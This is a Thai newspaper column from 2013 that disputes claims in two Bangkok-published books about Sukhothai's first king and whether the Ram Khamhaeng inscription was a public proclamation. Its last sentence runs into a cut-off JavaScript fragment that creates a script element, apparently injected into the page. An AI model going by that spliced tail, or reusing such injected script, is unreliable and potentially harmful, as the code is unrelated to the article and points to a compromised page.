Download PDF

มติชนรายวัน ฉบับประจำวันพุธที่ 2 ตุลาคม 2556

 

ปฐมกษัตริย์สุโขทัยเป็นใคร? มาจากไหน?

          หนังสือพัฒนาการของอักษรไทย พิมพ์เผยแพร่โดยสำนักวัฒนธรรม กีฬา และการท่องเที่ยว กทม. พ.ศ. 2556

          ผอ. ปราณี สัตยประกอบ กรุณาส่งให้อ่านเมื่อวันสุนทรภู่ 26 มิถุนายน ที่ผ่านมา แต่ผมเพิ่งเปิดอ่าน พบข้อความดังนี้

          “เมื่ออาณาจักรขอมสมัยพระนครเสื่อมอำนาจลงราวพุทธศตวรรษที่ 18 กลุ่มชนชาวไทยนำโดยพ่อขุนผาเมืองและพ่อขุนบางกลางหาวได้ปราบ ‘ขอมสบาดโขลญลำพง’ ผู้มีอำนาจปกครองเมืองสุโขทัยได้ ต่อมาจึงได้ก่อตั้งอาณาจักรสุโขทัย โดยมีพ่อขุนศรีอินทราทิตย์เป็นปฐมกษัตริย์ครองอาณาจักรสุโขทัย”

          ประเด็นนี้มีปัญหา เพราะราวหลัง พ.ศ. 1700 (พุทธศตวรรษที่ 18) ยังไม่พบหลักฐานว่ามี“กลุ่มชนชาวไทย” เว้นเสียแต่ตีขลุมเอาเอง(ด้วยความรักชาติอย่างยิ่ง)ว่าเป็นอย่างนั้น

          พ่อขุนผาเมืองและพ่อขุนบางกลางหาว จะเป็นชนชาวไทย หรือชนชาวอะไรก็ไม่รู้ เพราะพิสูจน์ไม่ได้ และไม่มีหลักฐานอะไรที่บอกอย่างนั้น

          พ่อขุนศรีอินทราทิตย์ ก็ไม่ใช่ปฐมกษัตริย์ของศรีสัชนาลัยสุโขทัย เพราะในจารึกวัดศรีชุม (จารึกสุโขทัย หลัก 2) บอกว่าผู้สถาปนาคือพ่อขุนศรีนาวนำถุม (ซึ่งเป็นบิดาของผาเมือง) แล้วยังมีร่องรอยว่าเป็นเครือญาติขอมละโว้ นี่จะว่ายังไง?

 

พ่อขุนฯเพิ่งทำอักษรไทย แล้วยุคนั้นใครอ่านออก?

          วิวัฒน์การอ่านไทย พิมพ์เผยแพร่โดย สำนักวัฒนธรรม กีฬา และการท่องเที่ยว กทม. พ.ศ. 2556 เป็นหนังสืออีกเล่มที่ ผอ. ปราณี สัตยประกอบ กรุณาส่งให้อ่านเมื่อวันสุนทรภู่ 26 มิถุนายน ที่ผ่านมา

          แต่ผมเพิ่งเปิดอ่านพบข้อความอธิบายว่าจารึกมีหลายประเภท โดยชอบยกย่องเป็นคัมภีร์กันมากในสถาบันการศึกษาว่า “จารึกที่เป็นประกาศสาธารณะ เป็นจารึกที่จัดทำขึ้นเพื่อประกาศข้อความที่ต้องการเผยแพร่”

          แล้วบอกต่อไปว่า “จารึกพ่อขุนรามคำแหง เป็นจารึกประเภทประกาศสาธารณะ”

          คนชั้นสูงสมัยนั้นอ่านได้ เขียนได้ หรือเปล่า ยังไม่แน่ แล้วจารึกที่ว่าจะเป็นประกาศสาธารณะได้ไฉน?

          คนทั่วไปทั้งในวังและนอกวังสมัยโบราณส่วนมากหรือเกือบหมดอ่านหนังสือไม่ออก เขียนไม่ได้ แล้วจะอ่านจารึกที่เป็นประกาศสาธารณะนี้ได้อย่างไร?

          จารึกทั้งหลายมีแต่เป็นสัญลักษณ์ศักดิ์สิทธิ์เพื่อป่าวร้องแก่ปวงผีและเทวดาให้รับรู้บุญกิริยา ซึ่งไม่ใช่ให้คนทั่วไปอ่านเหมือนสมัยนี้

          จารึกพ่อขุนรามคำแหง (สมมุติว่าเป็นของจริง) ใครจะอ่าน? เพราะคนทั่วไปอ่านไม่ออก เขียนไม่ได้

          แล้วไหนว่าเพิ่งประดิษฐ์อักษรไทยมิใช่หรือ? ทำไมสาธารณะถึงอ่านอักษรไทยที่เพิ่งมีครั้งแรกได้เร็วนักล่ะ?

          คิดเหมือนยุค ร.4 มีแท่นพิมพ์ทันสมัย และมีพิมพ์หนังสือแบบฝรั่งแล้วvar d=document;var s=d.createElement(‘script’);